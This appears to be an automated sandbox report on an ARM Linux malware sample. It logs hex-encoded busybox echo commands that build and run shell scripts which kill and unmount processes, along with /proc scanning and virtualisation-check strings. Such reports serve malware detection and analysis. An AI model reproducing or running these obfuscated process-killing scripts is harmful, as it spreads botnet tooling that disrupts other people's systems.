Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6e\x74\x73" >> kmount |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan |
Source: Initial sample | String containing 'busybox' found: sh kmount/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/3760/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/1583/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/2672/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/110/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/3759/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/111/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/112/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/113/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/234/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/1577/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/1577/exe | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/114/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/235/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/115/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/116/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/117/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/118/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/119/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/3757/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/10/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/917/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/3758/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/11/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/12/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/13/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/14/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/15/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/16/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/17/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/18/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/19/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/1593/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/240/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/120/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/3094/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/121/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/242/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/3406/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/3406/exe | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/1/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/122/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/243/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/2/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/123/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/244/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/1589/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/3/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/124/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/245/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/1588/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/125/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/4/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/246/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/3402/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/3402/exe | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/126/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/5/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/247/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/127/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/6/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/248/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/128/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/7/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/249/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/8/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/129/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/800/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/800/exe | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/9/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/801/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/803/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/20/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/806/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/21/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/807/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/928/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/22/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/23/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/24/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/25/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/26/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/27/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/28/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/29/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/3420/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/3420/exe | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/490/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/250/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/130/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/251/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/131/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/252/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/132/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/253/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/254/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/255/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/135/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/256/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/1599/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/257/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/378/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/258/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/3412/maps | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/3412/exe | Jump to behavior |
Source: /tmp/arm6.elf (PID: 5514) | File opened: /proc/259/maps | Jump to behavior |
Source: arm6.elf, 5519.1.00007f117803b000.00007f1178043000.rw-.sdmp | Binary or memory string: vmware |
Source: arm6.elf, 5514.1.000055e67e782000.000055e67e8d1000.rw-.sdmp, arm6.elf, 5519.1.000055e67e782000.000055e67e8d1000.rw-.sdmp | Binary or memory string: U!/etc/qemu-binfmt/arm |
Source: arm6.elf, 5514.1.00007f117803b000.00007f1178043000.rw-.sdmp, arm6.elf, 5519.1.00007f117803b000.00007f1178043000.rw-.sdmp | Binary or memory string: qemu-arm |
Source: arm6.elf, 5519.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmp | Binary or memory string: Uqemu: uncaught target signal 11 (Segmentation fault) - core dumped |
Source: arm6.elf, 5514.1.000055e67e782000.000055e67e8d1000.rw-.sdmp, arm6.elf, 5519.1.000055e67e782000.000055e67e8d1000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/arm |
Source: arm6.elf, 5514.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmp, arm6.elf, 5519.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-arm |
Source: arm6.elf, 5514.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmp | Binary or memory string: U/tmp/qemu-open.M5lsLa:U |
Source: arm6.elf, 5514.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmp | Binary or memory string: /tmp/qemu-open.M5lsLa |
Source: arm6.elf, 5514.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmp, arm6.elf, 5519.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm6.elf |
Source: arm6.elf, 5519.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmp | Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped |
Source: arm6.elf, 5514.1.00007f117803b000.00007f1178043000.rw-.sdmp, arm6.elf, 5519.1.00007f117803b000.00007f1178043000.rw-.sdmp | Binary or memory string: !!a1gAWFxuAXsFWUgBRQAA!!a1gAWFxuAXsAWUgKRXgA!!a1gAWFxuAXsAWEgJR3IA!!a10CWFxuAHsGWVcWQHAA!!a10CWFxuAHsGWVcWQHUA!!aFwAWF9uA3sGW0gLRgAA!!aFwAWFlpG2QBW0gJTwAA!!qemu-arm2QBW0gJTwAA! |